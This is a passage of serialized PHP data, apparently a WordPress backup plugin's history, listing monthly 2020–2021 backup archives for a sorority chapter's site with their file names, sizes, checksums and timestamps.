f2b9232b9b7cfe6d5061e7fb190471abb\";s:8:\"uploads0\";s:64:\"e0f0795f58e18cf5f56d5eb57171e299f25d51758c9782b43dc81f3af4e62068\";s:8:\"uploads1\";s:64:\"acdcee3c59f61c6131a9c3b4a1ef1b55ff3f01760ef34564e84034a67bf56ad0\";s:7:\"others0\";s:64:\"5b8ed96cdf29ddfca151a52252d7452806beb97291850c731fcd0a074bcd8810\";s:3:\"db0\";s:64:\"7f1a4de92fc743ee35005f14a65fd85f21baddf489352773ea290908529e5482\";}}s:5:\"nonce\";s:12:\"6d54ee4bec26\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1626676567;s:6:\"themes\";i:1626676584;s:7:\"uploads\";i:1626676585;s:6:\"others\";i:1626676614;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1624082944;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-06-19-0109_Zeta_Phi_Beta_Sorority_Inc_Lam_d5bb36d00b0a-plugins.zip\";}s:12:\"plugins-size\";i:61974987;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-06-19-0109_Zeta_Phi_Beta_Sorority_Inc_Lam_d5bb36d00b0a-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-06-19-0109_Zeta_Phi_Beta_Sorority_Inc_Lam_d5bb36d00b0a-uploads.zip\";i:1;s:79:\"backup_2021-06-19-0109_Zeta_Phi_Beta_Sorority_Inc_Lam_d5bb36d00b0a-uploads2.zip\";}s:12:\"uploads-size\";i:389620505;s:13:\"uploads1-size\";i:230116493;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-06-19-0109_Zeta_Phi_Beta_Sorority_Inc_Lam_d5bb36d00b0a-others.zip\";}s:11:\"others-size\";i:131103444;s:2:\"db\";s:72:\"backup_2021-06-19-0109_Zeta_Phi_Beta_Sorority_Inc_Lam_d5bb36d00b0a-db.gz\";s:7:\"db-size\";i:2384182;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"481bead31c41c939b3961ba87262b9a0ba79a309\";s:7:\"themes0\";s:40:\"87bfda4968f2dff1427e4486e57234e51f22d9a0\";s:8:\"uploads0\";s:40:\"95cc2393c546f1fc687f9c0431e373998cee6502\";s:8:\"uploads1\";s:40:\"7b6b2a8c84a72b42648b96b2ed3410856091bf2a\";s:7:\"others0\";s:40:\"841d2283bcb25f5eaef2f7567d788a0d6776b08c\";s:3:\"db0\";s:40:\"219f1d6256e0d1915e2376df62b9e15b395da4b4\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"f3ff22eabec64b681af4243e6996c3db2c7dc4fa03ea9378ca339b13d47c4185\";s:7:\"themes0\";s:64:\"16b65d4c708a81be17039ef10b311c2daeb5a398daa578f6e7703ff5fdfcb7cd\";s:8:\"uploads0\";s:64:\"0624bc554c7ae69772a88d97a48829871fe4a7d08b94fc89a3a1dc628601b89a\";s:8:\"uploads1\";s:64:\"0c98da8e310b59109cbbcbc3b6f9b8ff5c1dcf972c04fa9be5f02be7b880a7b3\";s:7:\"others0\";s:64:\"c7ec8a2f95f411e7c54018beedd9e85c727413ee84cf7bbcbad87cfce5aefc5e\";s:3:\"db0\";s:64:\"87fcdd72c7e00b876f780ecbb0989b3bd086761059b4b6f8803a94269ebebbf5\";}}s:5:\"nonce\";s:12:\"d5bb36d00b0a\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1624082945;s:6:\"themes\";i:1624082960;s:7:\"uploads\";i:1624082961;s:6:\"others\";i:1624082995;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1621489896;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-05-20-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_a864cf2b3455-plugins.zip\";}s:12:\"plugins-size\";i:61626695;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-05-20-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_a864cf2b3455-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-05-20-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_a864cf2b3455-uploads.zip\";i:1;s:79:\"backup_2021-05-20-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_a864cf2b3455-uploads2.zip\";}s:12:\"uploads-size\";i:385136892;s:13:\"uploads1-size\";i:234599946;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-05-20-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_a864cf2b3455-others.zip\";}s:11:\"others-size\";i:131095578;s:2:\"db\";s:72:\"backup_2021-05-20-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_a864cf2b3455-db.gz\";s:7:\"db-size\";i:2372681;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"81d1ac22de81ef79fa56d019822182e4537e4bba\";s:7:\"themes0\";s:40:\"1a81b371fc16396f2e63f3bee369f73c504ef766\";s:8:\"uploads0\";s:40:\"ad4a96446e6e832a01367d17ec54c554ee698072\";s:8:\"uploads1\";s:40:\"40dbc5ca6a365f3451113ce31fb62de792bb37b1\";s:7:\"others0\";s:40:\"eb1078a8f1033c58b8a042d2009d9d7b441fea20\";s:3:\"db0\";s:40:\"4e478b5143b9eda8a8aa020690bafe75b525c5da\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"6e3587eac8c31b436a033afc0c927e669d47d8e828be92d1b21b71876c85c157\";s:7:\"themes0\";s:64:\"7d47e37fcda594990909da0fabb7abaf0e6114ef58d37bdb2300279800df0937\";s:8:\"uploads0\";s:64:\"879b8b5cc0cc1d2514d1348b057548d9fc4f4b83724e7348ff726fc8900fe2d3\";s:8:\"uploads1\";s:64:\"b6694c6ee1c65a01fdefefbcb236655ed94c9b3ef331ebf791544c19fa53ac43\";s:7:\"others0\";s:64:\"cddf2fb394f26f1b1c836f87e5ff85373e5f9696b6983ceeac900b92f8746019\";s:3:\"db0\";s:64:\"878ae8502ddec99395092a4408d2ea0ae94e7fa515119cc78bb0eedc65335e68\";}}s:5:\"nonce\";s:12:\"a864cf2b3455\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1621489896;s:6:\"themes\";i:1621489914;s:7:\"uploads\";i:1621489915;s:6:\"others\";i:1621489947;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1618900827;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-04-20-0140_Zeta_Phi_Beta_Sorority_Inc_Lam_6adad9869f58-plugins.zip\";}s:12:\"plugins-size\";i:61626695;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-04-20-0140_Zeta_Phi_Beta_Sorority_Inc_Lam_6adad9869f58-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-04-20-0140_Zeta_Phi_Beta_Sorority_Inc_Lam_6adad9869f58-uploads.zip\";i:1;s:79:\"backup_2021-04-20-0140_Zeta_Phi_Beta_Sorority_Inc_Lam_6adad9869f58-uploads2.zip\";}s:12:\"uploads-size\";i:388664294;s:13:\"uploads1-size\";i:231072384;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-04-20-0140_Zeta_Phi_Beta_Sorority_Inc_Lam_6adad9869f58-others.zip\";}s:11:\"others-size\";i:131095578;s:2:\"db\";s:72:\"backup_2021-04-20-0140_Zeta_Phi_Beta_Sorority_Inc_Lam_6adad9869f58-db.gz\";s:7:\"db-size\";i:2349219;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"0812a068f6da611b3f0ddb12af42c6d1ddc73bd4\";s:7:\"themes0\";s:40:\"f266f91c8b52d2ef89843ff940aa90a85e82d22f\";s:8:\"uploads0\";s:40:\"4950dc9f9bf9ee5b1fecae411222d44f1edf230f\";s:8:\"uploads1\";s:40:\"6c2e9fb8beacee32ee677d97adbd73d0bd6fc79c\";s:7:\"others0\";s:40:\"8aadca2b9643ebab42979bb63935a418207ff158\";s:3:\"db0\";s:40:\"08830020b3d72644b012ddbb53b89f25c975e79e\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"ccf671b163dc578c216d94988962a0170af05fd642695df6ea640ab6836ece36\";s:7:\"themes0\";s:64:\"709c529a4dfe0205f3ab41831b55d9b3d97af04435b37b7fb8a6fd11b4852101\";s:8:\"uploads0\";s:64:\"f15a7c810f0791f01c61745f1de1f747f89f20f3c5c9cd2f0c8023a65d37df8e\";s:8:\"uploads1\";s:64:\"f45e6b645670ab88e20e8cdfa49ee57c965eb5496451e3cf2887c3654ed19174\";s:7:\"others0\";s:64:\"37996e6bde3e893ce799bda822a0e08eb8d9816d78cd601d890085c9c78c2a42\";s:3:\"db0\";s:64:\"6960a52d8a853b5d6a1f5659d51847c302b848953f3af2a88035c1c36e95de34\";}}s:5:\"nonce\";s:12:\"6adad9869f58\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1618900827;s:6:\"themes\";i:1618900843;s:7:\"uploads\";i:1618900845;s:6:\"others\";i:1618900880;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1616305929;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-03-21-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_5f14a34d3d6a-plugins.zip\";}s:12:\"plugins-size\";i:61579863;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-03-21-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_5f14a34d3d6a-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-03-21-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_5f14a34d3d6a-uploads.zip\";i:1;s:79:\"backup_2021-03-21-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_5f14a34d3d6a-uploads2.zip\";}s:12:\"uploads-size\";i:388664134;s:13:\"uploads1-size\";i:231072384;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-03-21-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_5f14a34d3d6a-others.zip\";}s:11:\"others-size\";i:131093201;s:2:\"db\";s:72:\"backup_2021-03-21-0052_Zeta_Phi_Beta_Sorority_Inc_Lam_5f14a34d3d6a-db.gz\";s:7:\"db-size\";i:2328177;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"5206d7ac11d8169e91c9f2503c96a381a489996f\";s:7:\"themes0\";s:40:\"b5801bca6dc411fdfc59863399bb64812bd8d119\";s:8:\"uploads0\";s:40:\"1c666c8bae557cf9a1ff1ac4c09b2c7aa72e3f2f\";s:8:\"uploads1\";s:40:\"1b69155ad65215a78ea3536b083a58d9dcdb9730\";s:7:\"others0\";s:40:\"e5ccede706cced4c5e3ffc85900cb103b265fed7\";s:3:\"db0\";s:40:\"6772600ce6f710d81785ee192488d55ae7d32133\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"6cecb51165401b41ae60aae6b016851cd2ce10e8b2abdcbb737a513071fb4a83\";s:7:\"themes0\";s:64:\"f334132219dbb56b0fba18c27e0e4ad1335643de5906b9e1993d6915debb9b9d\";s:8:\"uploads0\";s:64:\"63cf19d91f050879014baea2f277968296fa3ed89eddc4560196edb723628629\";s:8:\"uploads1\";s:64:\"e5ffa7064d9f8246df0bfa6e4a93cc75000f11f5157e8f09816d60cb34f8cb71\";s:7:\"others0\";s:64:\"1bfb5c6e5eba590364245b7ca0d46e312c3dbea4df778e4b38a54eee9e52ca21\";s:3:\"db0\";s:64:\"72dbb92886c89d91fc40c3329f17cb83aba447095428e846f928769e1dcff1a6\";}}s:5:\"nonce\";s:12:\"5f14a34d3d6a\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1616305929;s:6:\"themes\";i:1616305944;s:7:\"uploads\";i:1616305945;s:6:\"others\";i:1616305978;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1613714303;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-02-19-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_0134cf175616-plugins.zip\";}s:12:\"plugins-size\";i:61577429;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-02-19-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_0134cf175616-themes.zip\";}s:11:\"themes-size\";i:9383767;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-02-19-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_0134cf175616-uploads.zip\";i:1;s:79:\"backup_2021-02-19-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_0134cf175616-uploads2.zip\";}s:12:\"uploads-size\";i:382373677;s:13:\"uploads1-size\";i:237362681;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-02-19-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_0134cf175616-others.zip\";}s:11:\"others-size\";i:131093156;s:2:\"db\";s:72:\"backup_2021-02-19-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_0134cf175616-db.gz\";s:7:\"db-size\";i:2311473;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"20025faf48bc5bb1c28a8af66221dfb05ae92724\";s:7:\"themes0\";s:40:\"e0218b557b01ae9fdd03e65c7546e09c2f6302a4\";s:8:\"uploads0\";s:40:\"e8102fbfa42c79098007657f02b8450ade87bea5\";s:8:\"uploads1\";s:40:\"c8f1c4d6cd0f5d301a200591c074932645b762f2\";s:7:\"others0\";s:40:\"39c1ac6ac8d9e6a359c8b9a2c977ad39c4344986\";s:3:\"db0\";s:40:\"d0e3f4c3ce38e70073f2366103e53be30a14c703\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"44670f4c3c997cd82feb8a03679c384ffc79094cf4bcd9a7470ab74bf553a461\";s:7:\"themes0\";s:64:\"ce5d5cca5a7f8f80f856cfc4f2c394cb24e1f2d7fe5185b4586be827c17ffc6b\";s:8:\"uploads0\";s:64:\"675203d215269bb7e83df45863552085c229b2efc1c56a70084e419ba2ea1fce\";s:8:\"uploads1\";s:64:\"807f2e38f145fa751187f401fce4e009bfb98f2ab61011a1a4074dd65d00a776\";s:7:\"others0\";s:64:\"dc3865d00d735df7eb2ddcd82759dacee3e2b202aaec34b85dc4f83ca41e6d49\";s:3:\"db0\";s:64:\"425c7eca43933d1a9dca0d49c1300b245a79b803e18d7d0c077a4563ddec82e6\";}}s:5:\"nonce\";s:12:\"0134cf175616\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1613714303;s:6:\"themes\";i:1613714328;s:7:\"uploads\";i:1613714329;s:6:\"others\";i:1613714376;}s:18:\"created_by_version\";s:7:\"1.16.46\";s:21:\"last_saved_by_version\";s:7:\"1.16.46\";s:12:\"is_multisite\";b:0;}i:1611122832;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2021-01-20-0107_Zeta_Phi_Beta_Sorority_Inc_Lam_ffde96735fa9-plugins.zip\";}s:12:\"plugins-size\";i:59055280;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2021-01-20-0107_Zeta_Phi_Beta_Sorority_Inc_Lam_ffde96735fa9-themes.zip\";}s:11:\"themes-size\";i:6650581;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2021-01-20-0107_Zeta_Phi_Beta_Sorority_Inc_Lam_ffde96735fa9-uploads.zip\";i:1;s:79:\"backup_2021-01-20-0107_Zeta_Phi_Beta_Sorority_Inc_Lam_ffde96735fa9-uploads2.zip\";}s:12:\"uploads-size\";i:381670078;s:13:\"uploads1-size\";i:233724347;s:6:\"others\";a:1:{i:0;s:77:\"backup_2021-01-20-0107_Zeta_Phi_Beta_Sorority_Inc_Lam_ffde96735fa9-others.zip\";}s:11:\"others-size\";i:131083368;s:2:\"db\";s:72:\"backup_2021-01-20-0107_Zeta_Phi_Beta_Sorority_Inc_Lam_ffde96735fa9-db.gz\";s:7:\"db-size\";i:2239004;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"b2050d1239246ac81b843b70006b0eb6e2908761\";s:7:\"themes0\";s:40:\"91a9b9eaa03283242746e55b1fa8fd3ff4229e0e\";s:8:\"uploads0\";s:40:\"ad68ae0fef24fddb9226b72ba02b5b11c590aa6f\";s:8:\"uploads1\";s:40:\"c097398b3edf2e1373e9151eb697b3db460e73eb\";s:7:\"others0\";s:40:\"d2eb50be206168563afd4130e06055efbe4908b2\";s:3:\"db0\";s:40:\"e02803921aaf0ec541f1e5ef406b96472dee0945\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"e2e28aec45d0e99485f40c261a2a15c28b26dfad6e03fb174c204333644f8b51\";s:7:\"themes0\";s:64:\"865457fa45486e15add40782ee9468f05f9d1f0f08e86052d0a0b8e69207425d\";s:8:\"uploads0\";s:64:\"f62f572b4fe3140a6dba8d2ed5244bc183e2216c944708b0615df1bff78c5900\";s:8:\"uploads1\";s:64:\"b1f7e5f1148857ce82d47747ae1a06dcf5d30dd1195984ac0f676aaa68540225\";s:7:\"others0\";s:64:\"c3a82773af0aacbd58d2c2d23f55d474a7cc6dac752e1f5da62b7ccbd5b1fd8e\";s:3:\"db0\";s:64:\"79cb3d1acfc34f633b8032cc4e28d77fd1749e53471737a04613ff28973e072c\";}}s:5:\"nonce\";s:12:\"ffde96735fa9\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1611122832;s:6:\"themes\";i:1611122850;s:7:\"uploads\";i:1611122851;s:6:\"others\";i:1611122886;}s:18:\"created_by_version\";s:7:\"1.16.29\";s:21:\"last_saved_by_version\";s:7:\"1.16.29\";s:12:\"is_multisite\";b:0;}i:1608530682;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-12-21-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_46d7c62a0d8b-plugins.zip\";}s:12:\"plugins-size\";i:59055280;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-12-21-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_46d7c62a0d8b-themes.zip\";}s:11:\"themes-size\";i:6650581;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-12-21-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_46d7c62a0d8b-uploads.zip\";i:1;s:79:\"backup_2020-12-21-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_46d7c62a0d8b-uploads2.zip\";}s:12:\"uploads-size\";i:381669764;s:13:\"uploads1-size\";i:233724347;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-12-21-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_46d7c62a0d8b-others.zip\";}s:11:\"others-size\";i:131083368;s:2:\"db\";s:72:\"backup_2020-12-21-0104_Zeta_Phi_Beta_Sorority_Inc_Lam_46d7c62a0d8b-db.gz\";s:7:\"db-size\";i:2256597;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"4cee8bcaea73275b1561e947306a092d3e33bef3\";s:7:\"themes0\";s:40:\"16777b953ab5480c199c925549603b1ab7ec780a\";s:8:\"uploads0\";s:40:\"2a20bb2981c4d0de5cfba8ad18e60af04dbe7442\";s:8:\"uploads1\";s:40:\"1ba339e235fd2f3a4f32e75c05ad608b438a15bc\";s:7:\"others0\";s:40:\"704738f221309759d2f499a4c122c703e70b8838\";s:3:\"db0\";s:40:\"a4cfda4dca437ccecaa5d5225c3141b996472065\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"8e66226d9e8a0644cddc673ea3ca5de46eef37e1b7158237dd8fac873ec7a3f4\";s:7:\"themes0\";s:64:\"2510a2961f9fc820bf200a8d679df94ccb35a1c1f085d8d8bbb15f547a158857\";s:8:\"uploads0\";s:64:\"0af15ce9b39f22412b73fa03f1c08ba403345b0a26a5ec66ad2b76d07a487d1f\";s:8:\"uploads1\";s:64:\"6116665d977d530a11059c4da837cf6461d3d88c9eb8a70f09e91d8de53dd792\";s:7:\"others0\";s:64:\"32408778b5323156c3f91965e524330c00ac540050d6e876bb6e18ff06bc962d\";s:3:\"db0\";s:64:\"a671af6bf439c27f0afe4b9569c574795618e2e3bca1410c39557528c6c8070a\";}}s:5:\"nonce\";s:12:\"46d7c62a0d8b\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1608530683;s:6:\"themes\";i:1608530701;s:7:\"uploads\";i:1608530701;s:6:\"others\";i:1608530735;}s:18:\"created_by_version\";s:7:\"1.16.29\";s:21:\"last_saved_by_version\";s:7:\"1.16.29\";s:12:\"is_multisite\";b:0;}i:1605939471;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-11-21-0117_Zeta_Phi_Beta_Sorority_Inc_Lam_ad53effa681a-plugins.zip\";}s:12:\"plugins-size\";i:59016052;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-11-21-0117_Zeta_Phi_Beta_Sorority_Inc_Lam_ad53effa681a-themes.zip\";}s:11:\"themes-size\";i:6650581;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-11-21-0117_Zeta_Phi_Beta_Sorority_Inc_Lam_ad53effa681a-uploads.zip\";i:1;s:79:\"backup_2020-11-21-0117_Zeta_Phi_Beta_Sorority_Inc_Lam_ad53effa681a-uploads2.zip\";}s:12:\"uploads-size\";i:381669604;s:13:\"uploads1-size\";i:233724347;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-11-21-0117_Zeta_Phi_Beta_Sorority_Inc_Lam_ad53effa681a-others.zip\";}s:11:\"others-size\";i:131083057;s:2:\"db\";s:72:\"backup_2020-11-21-0117_Zeta_Phi_Beta_Sorority_Inc_Lam_ad53effa681a-db.gz\";s:7:\"db-size\";i:2205093;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"a26a7cffac4f7693f16844212a5344c9478f9272\";s:7:\"themes0\";s:40:\"71b807a8b3139b6f18a2ad93419895230ebd84b3\";s:8:\"uploads0\";s:40:\"6cddcff11f1b617379390a8dd36fbe3afd5da02e\";s:8:\"uploads1\";s:40:\"fbca6adc70a0e9ed30667d65772e8e2b7a5991f4\";s:7:\"others0\";s:40:\"8dc025a1800f74552bfa398d4946dfd15e9483bf\";s:3:\"db0\";s:40:\"109c459c1176b8d654b5e8875cab81cc6861772c\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"10f7f8c613efaa6fb3611c3e71963e6c3582f3d6d116392988ce033463514a45\";s:7:\"themes0\";s:64:\"d44425d6fd56f3d056b3811298c364f6b09cc0982a18acbbe256a229f929d57d\";s:8:\"uploads0\";s:64:\"79232a77541b50a9896f5d9f75bf59e30c1e692daa029920b19aab4f170d59d1\";s:8:\"uploads1\";s:64:\"be1e20c6ea8041226481ebafcd6ec37de0fe665cc72c8fc13c5a9d0e9015d563\";s:7:\"others0\";s:64:\"a34df1a0abf67d282d736a4c3860a45edb7653ffe9f512348eadfe78ad62f209\";s:3:\"db0\";s:64:\"64df6867df5a5d9e110bf67975b0e3923b938f7998f59d2091a37cf65b636ca6\";}}s:5:\"nonce\";s:12:\"ad53effa681a\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1605939471;s:6:\"themes\";i:1605939489;s:7:\"uploads\";i:1605939490;s:6:\"others\";i:1605939521;}s:18:\"created_by_version\";s:7:\"1.16.29\";s:21:\"last_saved_by_version\";s:7:\"1.16.29\";s:12:\"is_multisite\";b:0;}i:1603346122;a:20:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-10-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_2bddf39a6b34-plugins.zip\";}s:12:\"plugins-size\";i:59779415;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-10-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_2bddf39a6b34-themes.zip\";}s:11:\"themes-size\";i:6650581;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-10-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_2bddf39a6b34-uploads.zip\";i:1;s:79:\"backup_2020-10-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_2bddf39a6b34-uploads2.zip\";}s:12:\"uploads-size\";i:381669444;s:13:\"uploads1-size\";i:233724347;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-10-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_2bddf39a6b34-others.zip\";}s:11:\"others-size\";i:131078446;s:2:\"db\";s:72:\"backup_2020-10-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_2bddf39a6b34-db.gz\";s:7:\"db-size\";i:2208132;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"52cacb844c7be2fb468cb0d0b7e6c7c72e35516f\";s:7:\"themes0\";s:40:\"f55f026cd97b38e3b25d88cb04c4681b4fbaae6f\";s:8:\"uploads0\";s:40:\"15f8e8c209e9cea3aa17986a5de3a350b03114d9\";s:8:\"uploads1\";s:40:\"e249d52c2235fcdcd73f446e81f51cbadb3244a6\";s:7:\"others0\";s:40:\"530181a4f9f94060dcd6724a0a226aeb82072e90\";s:3:\"db0\";s:40:\"919bb590572eb95d30def1330b688d9fb3ea1aa9\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"2bb5baf5dea6032abc1bdc6d64a13fd739c51f39e57051ac44044d171fc4f33d\";s:7:\"themes0\";s:64:\"0756d0aff6f779fac2f76846b0bc6663b57ccd35e3abc91263eb380ed67acd83\";s:8:\"uploads0\";s:64:\"efe589d088dc30884fba85acd726b8196a35097e3fa26a2c6770ab29f802a673\";s:8:\"uploads1\";s:64:\"2ac0bf43312b06d28b11616adae5e8d34d5813aea2cf246160cd155b6844e1fc\";s:7:\"others0\";s:64:\"bd0a40ac3b9dc9f6d5ec2cf66ff2010965477c72e4526f414d82f3edb6bf8225\";s:3:\"db0\";s:64:\"ec45cd2d56667c4c95af574df4cd2e9f0e6cfc3e2e45d3ffd21120bc101aeae3\";}}s:5:\"nonce\";s:12:\"2bddf39a6b34\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1603346123;s:6:\"themes\";i:1603346194;s:7:\"uploads\";i:1603346195;s:6:\"others\";i:1603346231;}s:18:\"created_by_version\";s:7:\"1.16.29\";s:21:\"last_saved_by_version\";s:7:\"1.16.29\";s:12:\"is_multisite\";b:0;}i:1600754108;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2020-09-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_5a15787dc28c-plugins.zip\";}s:12:\"plugins-size\";i:51845040;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2020-09-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_5a15787dc28c-themes.zip\";}s:11:\"themes-size\";i:6650581;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2020-09-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_5a15787dc28c-uploads.zip\";i:1;s:79:\"backup_2020-09-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_5a15787dc28c-uploads2.zip\";}s:12:\"uploads-size\";i:402097648;s:13:\"uploads1-size\";i:213295983;s:6:\"others\";a:1:{i:0;s:77:\"backup_2020-09-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_5a15787dc28c-others.zip\";}s:11:\"others-size\";i:131048914;s:2:\"db\";s:72:\"backup_2020-09-22-0055_Zeta_Phi_Beta_Sorority_Inc_Lam_5a15787dc28c-db.gz\";s:7:\"db-size\";i:3726551;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"94badda7205fd2bb4343dc8802d49fabd7919d71\";s:7:\"themes0\";s:40: